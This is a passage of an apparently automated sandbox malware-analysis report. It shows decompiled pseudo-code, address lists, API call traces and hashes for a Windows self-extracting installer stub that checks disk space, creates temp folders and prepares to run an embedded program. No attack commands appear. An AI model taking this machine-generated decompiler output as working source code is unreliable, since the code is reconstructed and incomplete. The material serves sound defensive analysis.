                                                                                                                                                                                                        				return E00DE6CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                        			}





































                                                                                                                                                                                                        0x00de55ab
                                                                                                                                                                                                        0x00de55b2
                                                                                                                                                                                                        0x00de55c9
                                                                                                                                                                                                        0x00de55d5
                                                                                                                                                                                                        0x00de55d9
                                                                                                                                                                                                        0x00de5600
                                                                                                                                                                                                        0x00de5605
                                                                                                                                                                                                        0x00de560a
                                                                                                                                                                                                        0x00de560c
                                                                                                                                                                                                        0x00de5638
                                                                                                                                                                                                        0x00de5641
                                                                                                                                                                                                        0x00de5643
                                                                                                                                                                                                        0x00de5645
                                                                                                                                                                                                        0x00de5645
                                                                                                                                                                                                        0x00de564c
                                                                                                                                                                                                        0x00de5652
                                                                                                                                                                                                        0x00de5657
                                                                                                                                                                                                        0x00de5659
                                                                                                                                                                                                        0x00de5696
                                                                                                                                                                                                        0x00de569c
                                                                                                                                                                                                        0x00de589f
                                                                                                                                                                                                        0x00de58a7
                                                                                                                                                                                                        0x00de58ac
                                                                                                                                                                                                        0x00de58b3
                                                                                                                                                                                                        0x00de58b5
                                                                                                                                                                                                        0x00de56a2
                                                                                                                                                                                                        0x00de56a2
                                                                                                                                                                                                        0x00de56a8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de56ae
                                                                                                                                                                                                        0x00de56ae
                                                                                                                                                                                                        0x00de56b9
                                                                                                                                                                                                        0x00de56bf
                                                                                                                                                                                                        0x00de56c1
                                                                                                                                                                                                        0x00de56f3
                                                                                                                                                                                                        0x00de56f3
                                                                                                                                                                                                        0x00de5705
                                                                                                                                                                                                        0x00de570a
                                                                                                                                                                                                        0x00de5711
                                                                                                                                                                                                        0x00de5717
                                                                                                                                                                                                        0x00de5724
                                                                                                                                                                                                        0x00de5726
                                                                                                                                                                                                        0x00de5729
                                                                                                                                                                                                        0x00de5730
                                                                                                                                                                                                        0x00de5737
                                                                                                                                                                                                        0x00de573d
                                                                                                                                                                                                        0x00de5740
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de572b
                                                                                                                                                                                                        0x00de572b
                                                                                                                                                                                                        0x00de572e
                                                                                                                                                                                                        0x00de5742
                                                                                                                                                                                                        0x00de5742
                                                                                                                                                                                                        0x00de5745
                                                                                                                                                                                                        0x00de576b
                                                                                                                                                                                                        0x00de576b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5747
                                                                                                                                                                                                        0x00de5747
                                                                                                                                                                                                        0x00de574d
                                                                                                                                                                                                        0x00de574f
                                                                                                                                                                                                        0x00de5771
                                                                                                                                                                                                        0x00de5771
                                                                                                                                                                                                        0x00de5773
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5751
                                                                                                                                                                                                        0x00de5751
                                                                                                                                                                                                        0x00de5753
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5755
                                                                                                                                                                                                        0x00de575b
                                                                                                                                                                                                        0x00de5760
                                                                                                                                                                                                        0x00de5762
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5764
                                                                                                                                                                                                        0x00de5764
                                                                                                                                                                                                        0x00de5769
                                                                                                                                                                                                        0x00de577e
                                                                                                                                                                                                        0x00de577e
                                                                                                                                                                                                        0x00de5781
                                                                                                                                                                                                        0x00de5788
                                                                                                                                                                                                        0x00de578d
                                                                                                                                                                                                        0x00de578f
                                                                                                                                                                                                        0x00de57b2
                                                                                                                                                                                                        0x00de57b8
                                                                                                                                                                                                        0x00de57bd
                                                                                                                                                                                                        0x00de57bf
                                                                                                                                                                                                        0x00de57cd
                                                                                                                                                                                                        0x00de57cd
                                                                                                                                                                                                        0x00de57dd
                                                                                                                                                                                                        0x00de57e3
                                                                                                                                                                                                        0x00de57ef
                                                                                                                                                                                                        0x00de57f5
                                                                                                                                                                                                        0x00de57f8
                                                                                                                                                                                                        0x00de580a
                                                                                                                                                                                                        0x00de580a
                                                                                                                                                                                                        0x00de57fa
                                                                                                                                                                                                        0x00de5802
                                                                                                                                                                                                        0x00de5802
                                                                                                                                                                                                        0x00de580d
                                                                                                                                                                                                        0x00de580f
                                                                                                                                                                                                        0x00de5830
                                                                                                                                                                                                        0x00de5836
                                                                                                                                                                                                        0x00de583d
                                                                                                                                                                                                        0x00de584b
                                                                                                                                                                                                        0x00de5851
                                                                                                                                                                                                        0x00de5855
                                                                                                                                                                                                        0x00de585a
                                                                                                                                                                                                        0x00de585c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de585e
                                                                                                                                                                                                        0x00de585e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de585e
                                                                                                                                                                                                        0x00de5811
                                                                                                                                                                                                        0x00de5817
                                                                                                                                                                                                        0x00de5819
                                                                                                                                                                                                        0x00de581f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de581f
                                                                                                                                                                                                        0x00de5791
                                                                                                                                                                                                        0x00de5797
                                                                                                                                                                                                        0x00de579c
                                                                                                                                                                                                        0x00de579e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de57a0
                                                                                                                                                                                                        0x00de57a9
                                                                                                                                                                                                        0x00de57ae
                                                                                                                                                                                                        0x00de57b0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de57b0
                                                                                                                                                                                                        0x00de579e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5769
                                                                                                                                                                                                        0x00de5762
                                                                                                                                                                                                        0x00de5753
                                                                                                                                                                                                        0x00de574f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de572e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5864
                                                                                                                                                                                                        0x00de5864
                                                                                                                                                                                                        0x00de5864
                                                                                                                                                                                                        0x00de5717
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de56c3
                                                                                                                                                                                                        0x00de56c5
                                                                                                                                                                                                        0x00de56c9
                                                                                                                                                                                                        0x00de56ce
                                                                                                                                                                                                        0x00de56d0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de56d6
                                                                                                                                                                                                        0x00de56d6
                                                                                                                                                                                                        0x00de56d8
                                                                                                                                                                                                        0x00de56dd
                                                                                                                                                                                                        0x00de56df
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de56e1
                                                                                                                                                                                                        0x00de56e2
                                                                                                                                                                                                        0x00de56e4
                                                                                                                                                                                                        0x00de56e6
                                                                                                                                                                                                        0x00de56eb
                                                                                                                                                                                                        0x00de56ed
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de56f3
                                                                                                                                                                                                        0x00de56f3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de586c
                                                                                                                                                                                                        0x00de5878
                                                                                                                                                                                                        0x00de587e
                                                                                                                                                                                                        0x00de5882
                                                                                                                                                                                                        0x00de5883
                                                                                                                                                                                                        0x00de5889
                                                                                                                                                                                                        0x00de588e
                                                                                                                                                                                                        0x00de588e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5896
                                                                                                                                                                                                        0x00de56ed
                                                                                                                                                                                                        0x00de56df
                                                                                                                                                                                                        0x00de56d0
                                                                                                                                                                                                        0x00de56c1
                                                                                                                                                                                                        0x00de56a8
                                                                                                                                                                                                        0x00de565b
                                                                                                                                                                                                        0x00de565b
                                                                                                                                                                                                        0x00de565d
                                                                                                                                                                                                        0x00de5669
                                                                                                                                                                                                        0x00de5669
                                                                                                                                                                                                        0x00de565f
                                                                                                                                                                                                        0x00de565f
                                                                                                                                                                                                        0x00de5665
                                                                                                                                                                                                        0x00de5667
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5667
                                                                                                                                                                                                        0x00de566c
                                                                                                                                                                                                        0x00de5673
                                                                                                                                                                                                        0x00de5678
                                                                                                                                                                                                        0x00de567a
                                                                                                                                                                                                        0x00de589b
                                                                                                                                                                                                        0x00de589b
                                                                                                                                                                                                        0x00de5680
                                                                                                                                                                                                        0x00de5685
                                                                                                                                                                                                        0x00de568c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de568c
                                                                                                                                                                                                        0x00de567a
                                                                                                                                                                                                        0x00de560e
                                                                                                                                                                                                        0x00de5613
                                                                                                                                                                                                        0x00de561a
                                                                                                                                                                                                        0x00de5620
                                                                                                                                                                                                        0x00de5626
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5626
                                                                                                                                                                                                        0x00de55db
                                                                                                                                                                                                        0x00de55e0
                                                                                                                                                                                                        0x00de55e7
                                                                                                                                                                                                        0x00de55f1
                                                                                                                                                                                                        0x00de55f6
                                                                                                                                                                                                        0x00de55f6
                                                                                                                                                                                                        0x00de55f6
                                                                                                                                                                                                        0x00de58b7
                                                                                                                                                                                                        0x00de58c7

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00DE468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DE46A0
                                                                                                                                                                                                          • Part of subcall function 00DE468F: SizeofResource.KERNEL32(00000000,00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46A9
                                                                                                                                                                                                          • Part of subcall function 00DE468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DE46C3
                                                                                                                                                                                                          • Part of subcall function 00DE468F: LoadResource.KERNEL32(00000000,00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46CC
                                                                                                                                                                                                          • Part of subcall function 00DE468F: LockResource.KERNEL32(00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46D3
                                                                                                                                                                                                          • Part of subcall function 00DE468F: memcpy_s.MSVCRT ref: 00DE46E5
                                                                                                                                                                                                          • Part of subcall function 00DE468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 00DE55CF
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00DE5638
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00DE564C
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00DE5620
                                                                                                                                                                                                          • Part of subcall function 00DE44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00DE4518
                                                                                                                                                                                                          • Part of subcall function 00DE44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00DE4554
                                                                                                                                                                                                          • Part of subcall function 00DE6285: GetLastError.KERNEL32(00DE5BBC), ref: 00DE6285
                                                                                                                                                                                                        • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00DE56B9
                                                                                                                                                                                                        • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 00DE571E
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00DE5737
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 00DE57CD
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 00DE57EF
                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00DE5802
                                                                                                                                                                                                          • Part of subcall function 00DE2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00DE2654
                                                                                                                                                                                                        • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00DE5830
                                                                                                                                                                                                          • Part of subcall function 00DE6517: FindResourceA.KERNEL32(00DE0000,000007D6,00000005), ref: 00DE652A
                                                                                                                                                                                                          • Part of subcall function 00DE6517: LoadResource.KERNEL32(00DE0000,00000000,?,?,00DE2EE8,00000000,00DE19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00DE6538
                                                                                                                                                                                                          • Part of subcall function 00DE6517: DialogBoxIndirectParamA.USER32(00DE0000,00000000,00000547,00DE19E0,00000000), ref: 00DE6557
                                                                                                                                                                                                          • Part of subcall function 00DE6517: FreeResource.KERNEL32(00000000,?,?,00DE2EE8,00000000,00DE19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00DE6560
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00DE5878
                                                                                                                                                                                                          • Part of subcall function 00DE597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00DE59A8
                                                                                                                                                                                                          • Part of subcall function 00DE597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 00DE59AF
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                        • API String ID: 2436801531-1782941137
                                                                                                                                                                                                        • Opcode ID: c4c41d64a6379b1ae85dd25762fb3666d3c24572644bb260043fcf7a30f335fc
                                                                                                                                                                                                        • Instruction ID: d4ff2c5eb2be8b399e8350452c8189a97cad69842bb0e5b3ed364efb52eeed15
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c4c41d64a6379b1ae85dd25762fb3666d3c24572644bb260043fcf7a30f335fc
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2811C70A04BC55ADB20BB37ACC5BEE765D9B61388F440065F58AD6299DFB0CEC18A70
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 324 de597d-de59b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 de59dd-de5a1b GetDiskFreeSpaceA 324->325 326 de59bb-de59d8 call de44b9 call de6285 324->326 328 de5ba1-de5bde memset call de6285 GetLastError FormatMessageA 325->328 329 de5a21-de5a4a MulDiv 325->329 345 de5c05-de5c14 call de6ce0 326->345 337 de5be3-de5bfc call de44b9 SetCurrentDirectoryA 328->337 329->328 332 de5a50-de5a6c GetVolumeInformationA 329->332 335 de5a6e-de5ab0 memset call de6285 GetLastError FormatMessageA 332->335 336 de5ab5-de5aca SetCurrentDirectoryA 332->336 335->337 339 de5acc-de5ad1 336->339 351 de5c02 337->351 343 de5ae2-de5ae4 339->343 344 de5ad3-de5ad8 339->344 349 de5ae6 343->349 350 de5ae7-de5af8 343->350 344->343 347 de5ada-de5ae0 344->347 347->339 347->343 349->350 353 de5af9-de5afb 350->353 354 de5c04 351->354 355 de5afd-de5b03 353->355 356 de5b05-de5b08 353->356 354->345 355->353 355->356 357 de5b0a-de5b1b call de44b9 356->357 358 de5b20-de5b27 356->358 357->351 359 de5b29-de5b33 358->359 360 de5b52-de5b5b 358->360 359->360 362 de5b35-de5b50 359->362 363 de5b62-de5b6d 360->363 362->363 365 de5b6f-de5b74 363->365 366 de5b76-de5b7d 363->366 367 de5b85 365->367 368 de5b7f-de5b81 366->368 369 de5b83 366->369 370 de5b96-de5b9f 367->370 371 de5b87-de5b94 call de268b 367->371 368->367 369->367 370->354 371->354
                                                                                                                                                                                                        C-Code - Quality: 96%
                                                                                                                                                                                                        			E00DE597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v16;
                                                                                                                                                                                                        				char _v276;
                                                                                                                                                                                                        				char _v788;
                                                                                                                                                                                                        				long _v792;
                                                                                                                                                                                                        				long _v796;
                                                                                                                                                                                                        				long _v800;
                                                                                                                                                                                                        				signed int _v804;
                                                                                                                                                                                                        				long _v808;
                                                                                                                                                                                                        				int _v812;
                                                                                                                                                                                                        				long _v816;
                                                                                                                                                                                                        				long _v820;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t46;
                                                                                                                                                                                                        				int _t50;
                                                                                                                                                                                                        				signed int _t55;
                                                                                                                                                                                                        				void* _t66;
                                                                                                                                                                                                        				int _t69;
                                                                                                                                                                                                        				signed int _t73;
                                                                                                                                                                                                        				signed short _t78;
                                                                                                                                                                                                        				signed int _t87;
                                                                                                                                                                                                        				signed int _t101;
                                                                                                                                                                                                        				int _t102;
                                                                                                                                                                                                        				unsigned int _t103;
                                                                                                                                                                                                        				unsigned int _t105;
                                                                                                                                                                                                        				signed int _t111;
                                                                                                                                                                                                        				long _t112;
                                                                                                                                                                                                        				signed int _t116;
                                                                                                                                                                                                        				CHAR* _t118;
                                                                                                                                                                                                        				signed int _t119;
                                                                                                                                                                                                        				signed int _t120;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t114 = __edi;
                                                                                                                                                                                                        				_t46 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t46 ^ _t120;
                                                                                                                                                                                                        				_v804 = __edx;
                                                                                                                                                                                                        				_t118 = __ecx;
                                                                                                                                                                                                        				GetCurrentDirectoryA(0x104,  &_v276);
                                                                                                                                                                                                        				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                                                                                                                                                        				if(_t50 != 0) {
                                                                                                                                                                                                        					_push(__edi);
                                                                                                                                                                                                        					_v796 = 0;
                                                                                                                                                                                                        					_v792 = 0;
                                                                                                                                                                                                        					_v800 = 0;
                                                                                                                                                                                                        					_v808 = 0;
                                                                                                                                                                                                        					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                                                                                                                                                        					__eflags = _t55;
                                                                                                                                                                                                        					if(_t55 == 0) {
                                                                                                                                                                                                        						L29:
                                                                                                                                                                                                        						memset( &_v788, 0, 0x200);
                                                                                                                                                                                                        						 *0xde9124 = E00DE6285();
                                                                                                                                                                                                        						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                        						_t110 = 0x4b0;
                                                                                                                                                                                                        						L30:
                                                                                                                                                                                                        						__eflags = 0;
                                                                                                                                                                                                        						E00DE44B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                                                                                                                                                        						SetCurrentDirectoryA( &_v276);
                                                                                                                                                                                                        						L31:
                                                                                                                                                                                                        						_t66 = 0;
                                                                                                                                                                                                        						__eflags = 0;
                                                                                                                                                                                                        						L32:
                                                                                                                                                                                                        						_pop(_t114);
                                                                                                                                                                                                        						goto L33;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t69 = _v792 * _v796;
                                                                                                                                                                                                        					_v812 = _t69;
                                                                                                                                                                                                        					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                                                                                                                                                        					__eflags = _t116;
                                                                                                                                                                                                        					if(_t116 == 0) {
                                                                                                                                                                                                        						goto L29;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                                                                                                                                                        					__eflags = _t73;
                                                                                                                                                                                                        					if(_t73 != 0) {
                                                                                                                                                                                                        						SetCurrentDirectoryA( &_v276); // executed
                                                                                                                                                                                                        						_t101 =  &_v16;
                                                                                                                                                                                                        						_t111 = 6;
                                                                                                                                                                                                        						_t119 = _t118 - _t101;
                                                                                                                                                                                                        						__eflags = _t119;
                                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                                        							_t22 = _t111 - 4; // 0x2
                                                                                                                                                                                                        							__eflags = _t22;
                                                                                                                                                                                                        							if(_t22 == 0) {
                                                                                                                                                                                                        								break;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                                                                                                                                                        							__eflags = _t87;
                                                                                                                                                                                                        							if(_t87 == 0) {
                                                                                                                                                                                                        								break;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							 *_t101 = _t87;
                                                                                                                                                                                                        							_t101 = _t101 + 1;
                                                                                                                                                                                                        							_t111 = _t111 - 1;
                                                                                                                                                                                                        							__eflags = _t111;
                                                                                                                                                                                                        							if(_t111 != 0) {
                                                                                                                                                                                                        								continue;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							break;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _t111;
                                                                                                                                                                                                        						if(_t111 == 0) {
                                                                                                                                                                                                        							_t101 = _t101 - 1;
                                                                                                                                                                                                        							__eflags = _t101;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *_t101 = 0;
                                                                                                                                                                                                        						_t112 = 0x200;
                                                                                                                                                                                                        						_t102 = _v812;
                                                                                                                                                                                                        						_t78 = 0;
                                                                                                                                                                                                        						_t118 = 8;
                                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                                        							__eflags = _t102 - _t112;
                                                                                                                                                                                                        							if(_t102 == _t112) {
                                                                                                                                                                                                        								break;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t112 = _t112 + _t112;
                                                                                                                                                                                                        							_t78 = _t78 + 1;
                                                                                                                                                                                                        							__eflags = _t78 - _t118;
                                                                                                                                                                                                        							if(_t78 < _t118) {
                                                                                                                                                                                                        								continue;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							break;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _t78 - _t118;
                                                                                                                                                                                                        						if(_t78 != _t118) {
                                                                                                                                                                                                        							__eflags =  *0xde9a34 & 0x00000008;
                                                                                                                                                                                                        							if(( *0xde9a34 & 0x00000008) == 0) {
                                                                                                                                                                                                        								L20:
                                                                                                                                                                                                        								_t103 =  *0xde9a38; // 0x0
                                                                                                                                                                                                        								_t110 =  *((intOrPtr*)(0xde89e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                        								L21:
                                                                                                                                                                                                        								__eflags = (_v804 & 0x00000003) - 3;
                                                                                                                                                                                                        								if((_v804 & 0x00000003) != 3) {
                                                                                                                                                                                                        									__eflags = _v804 & 0x00000001;
                                                                                                                                                                                                        									if((_v804 & 0x00000001) == 0) {
                                                                                                                                                                                                        										__eflags = _t103 - _t116;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										__eflags = _t110 - _t116;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									__eflags = _t103 + _t110 - _t116;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								if(__eflags <= 0) {
                                                                                                                                                                                                        									 *0xde9124 = 0;
                                                                                                                                                                                                        									_t66 = 1;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t66 = E00DE268B(_a4, _t110, _t103,  &_v16);
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _v816 & 0x00008000;
                                                                                                                                                                                                        							if((_v816 & 0x00008000) == 0) {
                                                                                                                                                                                                        								goto L20;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t105 =  *0xde9a38; // 0x0
                                                                                                                                                                                                        							_t110 =  *((intOrPtr*)(0xde89e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0xde89e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                        							_t103 = (_t105 >> 2) +  *0xde9a38;
                                                                                                                                                                                                        							goto L21;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t110 = 0x4c5;
                                                                                                                                                                                                        						E00DE44B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						goto L31;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                        					 *0xde9124 = E00DE6285();
                                                                                                                                                                                                        					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                        					_t110 = 0x4f9;
                                                                                                                                                                                                        					goto L30;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t110 = 0x4bc;
                                                                                                                                                                                                        					E00DE44B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					 *0xde9124 = E00DE6285();
                                                                                                                                                                                                        					_t66 = 0;
                                                                                                                                                                                                        					L33:
                                                                                                                                                                                                        					return E00DE6CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}



































                                                                                                                                                                                                        0x00de597d
                                                                                                                                                                                                        0x00de5988
                                                                                                                                                                                                        0x00de598f
                                                                                                                                                                                                        0x00de599a
                                                                                                                                                                                                        0x00de59a6
                                                                                                                                                                                                        0x00de59a8
                                                                                                                                                                                                        0x00de59af
                                                                                                                                                                                                        0x00de59b9
                                                                                                                                                                                                        0x00de59dd
                                                                                                                                                                                                        0x00de59e4
                                                                                                                                                                                                        0x00de59f1
                                                                                                                                                                                                        0x00de59fe
                                                                                                                                                                                                        0x00de5a0b
                                                                                                                                                                                                        0x00de5a13
                                                                                                                                                                                                        0x00de5a19
                                                                                                                                                                                                        0x00de5a1b
                                                                                                                                                                                                        0x00de5ba1
                                                                                                                                                                                                        0x00de5baf
                                                                                                                                                                                                        0x00de5bbd
                                                                                                                                                                                                        0x00de5bd8
                                                                                                                                                                                                        0x00de5bde
                                                                                                                                                                                                        0x00de5be3
                                                                                                                                                                                                        0x00de5bec
                                                                                                                                                                                                        0x00de5bf0
                                                                                                                                                                                                        0x00de5bfc
                                                                                                                                                                                                        0x00de5c02
                                                                                                                                                                                                        0x00de5c02
                                                                                                                                                                                                        0x00de5c02
                                                                                                                                                                                                        0x00de5c04
                                                                                                                                                                                                        0x00de5c04
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5c04
                                                                                                                                                                                                        0x00de5a27
                                                                                                                                                                                                        0x00de5a3a
                                                                                                                                                                                                        0x00de5a46
                                                                                                                                                                                                        0x00de5a48
                                                                                                                                                                                                        0x00de5a4a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5a64
                                                                                                                                                                                                        0x00de5a6a
                                                                                                                                                                                                        0x00de5a6c
                                                                                                                                                                                                        0x00de5abc
                                                                                                                                                                                                        0x00de5ac2
                                                                                                                                                                                                        0x00de5ac9
                                                                                                                                                                                                        0x00de5aca
                                                                                                                                                                                                        0x00de5aca
                                                                                                                                                                                                        0x00de5acc
                                                                                                                                                                                                        0x00de5acc
                                                                                                                                                                                                        0x00de5acf
                                                                                                                                                                                                        0x00de5ad1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5ad3
                                                                                                                                                                                                        0x00de5ad6
                                                                                                                                                                                                        0x00de5ad8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5ada
                                                                                                                                                                                                        0x00de5adc
                                                                                                                                                                                                        0x00de5add
                                                                                                                                                                                                        0x00de5add
                                                                                                                                                                                                        0x00de5ae0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5ae0
                                                                                                                                                                                                        0x00de5ae2
                                                                                                                                                                                                        0x00de5ae4
                                                                                                                                                                                                        0x00de5ae6
                                                                                                                                                                                                        0x00de5ae6
                                                                                                                                                                                                        0x00de5ae6
                                                                                                                                                                                                        0x00de5ae9
                                                                                                                                                                                                        0x00de5aeb
                                                                                                                                                                                                        0x00de5af0
                                                                                                                                                                                                        0x00de5af6
                                                                                                                                                                                                        0x00de5af8
                                                                                                                                                                                                        0x00de5af9
                                                                                                                                                                                                        0x00de5af9
                                                                                                                                                                                                        0x00de5afb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
